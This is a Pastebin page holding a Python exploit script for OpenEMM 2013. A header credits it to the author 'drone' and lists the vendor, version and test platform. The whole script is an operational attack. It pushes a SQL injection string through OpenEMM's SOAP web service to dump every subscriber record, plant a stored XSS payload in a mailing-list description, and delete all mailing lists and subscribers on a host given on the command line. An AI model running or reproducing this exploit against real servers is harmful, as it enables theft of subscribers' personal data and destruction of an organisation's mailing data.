daily pastebin goal
55%
SHARE
TWEET

openemm sploit

a guest Jul 23rd, 2013 101 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import os
  2. import sys
  3. from SOAPpy import WSDL
  4. from argparse import ArgumentParser
  5. from re import sub
  6.  
  7. # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
  8. # Date: 07/20/2013
  9. # Exploit Author: drone (@dronesec)
  10. # Vendor Homepage: http://www.openemm.org/
  11. # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
  12. # Version: 2013 (8.10.380.hf13.0.066)
  13. # Tested on: Ubuntu 12.04
  14.  
  15. """ Exploits a host of vulnerabilities discovered in OpenEMM.
  16.    Required ws.wsdl file should be in local directory.
  17. """
  18. def run(options):
  19.     """ run exploit
  20.    """
  21.     wsdl_file = "./ws.wsdl"
  22.     sploit = "\\' OR 1=1;-- "
  23.  
  24.     _server = WSDL.Proxy(wsdl_file)
  25.  
  26.     if options.subscribers:
  27.         # iterate until we get a null response
  28.         idx = 1
  29.         while True:
  30.             ret = _server.getSubscriber("wsadmin", sploit, idx)
  31.             if ret.paramValues == '':
  32.                 print '[!] Discovered %d subscribers'%(idx-1)
  33.                 break
  34.  
  35.             print ret.paramValues
  36.             idx += 1
  37.  
  38.     elif options.mlist:
  39.         try:
  40.             print '[!] Description field vulnerable to stored xss!'
  41.             description = raw_input('[!] Enter mlist description: ')
  42.         except:
  43.             description = ''
  44.  
  45.         ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
  46.         if ret > 0: print '[!] Saved successfully'
  47.         else:       print '[!] Save unsuccessful'
  48.  
  49.     elif options.dmlist:
  50.         print '[!] Deleting all mailing lists...'
  51.         idx = 1
  52.         while True:
  53.             ret = _server.deleteMailinglist('wsadmin', sploit, idx)
  54.             if ret == 0:
  55.                 print '[!] Deleted %d mailing lists.'%idx
  56.                 break
  57.             idx += 1
  58.  
  59.     elif options.dsubs:
  60.         print '[!] Deleting all subscribers...'
  61.         idx = 1
  62.         while True:
  63.             ret = _server.deleteSubscriber('wsadmin', sploit, idx)
  64.             if ret == 0:
  65.                 print '[!] Deleted %d subscribers.'%idx
  66.                 break
  67.             idx += 1
  68.  
  69. def parse_args():
  70.     """ parse args and sub in the desired IP
  71.    """
  72.     parser = ArgumentParser()
  73.     parser.add_argument('-i', help='server address', action='store',
  74.                 dest='host', required=True)
  75.     parser.add_argument('-s', help='fetch all subscribers', action='store_true',
  76.                 dest='subscribers')
  77.     parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
  78.                 dest='mlist')
  79.     parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
  80.                 dest='dmlist')
  81.     parser.add_argument('--ds', help='delete all subscribers', action='store_true',
  82.                 dest='dsubs')
  83.  
  84.     options = parser.parse_args()
  85.     try:
  86.         # sub in server address
  87.         with open('ws.wsdl', 'r') as f:
  88.             out = open('tmp.wsdl', 'w+')
  89.             for line in f:
  90.                 line = sub('location="(.*?)"',
  91.                     'location="http://{0}:8080/emm_webservice"'.format(options.host),
  92.                     line)
  93.                 out.write(line)
  94.             out.close()
  95.     except IOError:
  96.         print '[-] ws.wsdl not found'
  97.         sys.exit(1)
  98.  
  99.     # replace ws.wsdl with temp one
  100.     os.system('mv tmp.wsdl ws.wsdl')
  101.     return options
  102.  
  103. if __name__ == "__main__":
  104.     options = parse_args()
  105.     run(options)
RAW Paste Data
Top